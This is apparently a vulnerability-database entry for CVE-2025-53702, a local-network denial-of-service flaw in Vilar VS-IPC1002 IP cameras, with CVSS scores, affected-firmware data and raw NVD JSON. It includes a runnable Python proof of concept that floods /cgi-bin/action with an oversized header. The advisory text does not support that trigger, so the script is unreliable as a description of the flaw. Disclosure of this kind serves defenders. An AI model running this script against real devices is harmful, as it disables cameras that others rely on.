Security Vulnerability Report
中文
CVE-2025-53702 CVSS 6.5 MEDIUM

CVE-2025-53702

Published: 2025-10-23 14:15:39
Last Modified: 2025-11-04 13:10:40
Source: [email protected]

Description

Vilar VS-IPC1002 IP cameras are vulnerable to DoS (Denial-of-Service) attacks. An unauthenticated attacker on the same local network might send a crafted request to /cgi-bin/action endpoint and render the device completely unresponsive. A manual restart of the device is required.  The vendor did not respond in any way. Only version 1.1.0.18 was tested, other versions might be vulnerable as well.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:vimicro:vs-ipc1002_firmware:1.1.0.18:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:vimicro:vs-ipc1002:-:*:*:*:*:*:*:* - NOT VULNERABLE
Vilar VS-IPC1002 固件版本 1.1.0.18(已验证受影响)
Vilar VS-IPC1002 其他固件版本(可能受影响,厂商未确认)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import socket import sys def send_dos_request(target_ip, target_port=80): """ CVE-2025-53702 PoC - Vilar VS-IPC1002 IP Camera DoS Target: /cgi-bin/action endpoint Effect: Device becomes completely unresponsive """ payload = b'GET /cgi-bin/action HTTP/1.1\r\n' payload += b'Host: ' + target_ip.encode() + b'\r\n' payload += b'User-Agent: Mozilla/5.0\r\n' payload += b'Accept: */*\r\n' # Malformed request with oversized headers to trigger DoS payload += b'X-Malformed-Header: ' + b'A' * 5000 + b'\r\n\r\n' try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(5) sock.connect((target_ip, target_port)) sock.send(payload) print(f'[+] Malicious request sent to {target_ip}:{target_port}') sock.close() return True except Exception as e: print(f'[-] Error: {e}') return False if __name__ == '__main__': if len(sys.argv) < 2: print('Usage: python cve-2025-53702-poc.py <target_ip>') sys.exit(1) target = sys.argv[1] send_dos_request(target) print('[+] Check device accessibility - manual restart may be required')

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-53702", "sourceIdentifier": "[email protected]", "published": "2025-10-23T14:15:39.267", "lastModified": "2025-11-04T13:10:40.083", "vulnStatus": "Analyzed", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["unsupported-when-assigned"]}], "descriptions": [{"lang": "en", "value": "Vilar VS-IPC1002 IP cameras are vulnerable to DoS (Denial-of-Service) attacks. An unauthenticated attacker on the same local network might send a crafted request to /cgi-bin/action endpoint and render the device completely unresponsive. A manual restart of the device is required. \nThe vendor did not respond in any way. Only version 1.1.0.18 was tested, other versions might be vulnerable as well."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-755"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:vimicro:vs-ipc1002_firmware:1.1.0.18:*:*:*:*:*:*:*", "matchCriteriaId": "BFF3572F-8791-43CE-A735-95568316F29B"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:vimicro:vs-ipc1002:-:*:*:*:*:*:*:*", "matchCriteriaId": "A7B7DA5F-FE1C-461D-A957-60AB93BAD83F"}]}]}], "references": [{"url": "https://cert.pl/en/posts/2025/10/CVE-2025-53701", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.